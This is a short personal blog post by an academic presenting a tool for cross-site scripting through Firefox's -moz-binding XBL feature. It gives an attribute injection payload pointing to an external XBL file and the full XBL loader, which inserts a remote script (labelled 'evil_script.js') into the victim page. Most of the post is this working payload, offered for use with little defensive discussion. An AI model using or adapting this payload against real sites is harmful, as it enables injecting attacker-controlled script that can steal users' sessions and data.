Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Github Stackoverflow MLA CORE Institutional Repo Hypothes.is ORCID ID  ORCID iD Wikipedia Pictures for Re-Use

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.

The process works as follows:

  1. Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
  2. Browser loads XBL document.
  3. XBL document modifies DOM to include <script src="evil_script.js"/>.
  4. Browser loads and parses Javascript.

The required XBL document (STXSS_XBL.xml) is as follows:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
    <binding id="loader">
        <implementation>
            <constructor>
                <![CDATA[
                    //This is the STXSS XBL Loader
                    //Edit this line to the URL of the STXSS Javascript
                    var url = "http://www.your-site.com/STXSS_JS.js";
                    //Do not edit below this line
                    var scr = document.createElement("script");
                    scr.setAttribute("src",url);
                    var bodyElement = document.getElementsByTagName("html").item(0);
                    bodyElement.appendChild(scr);
                 ]]>
            </constructor>
        </implementation>
    </binding>
</bindings>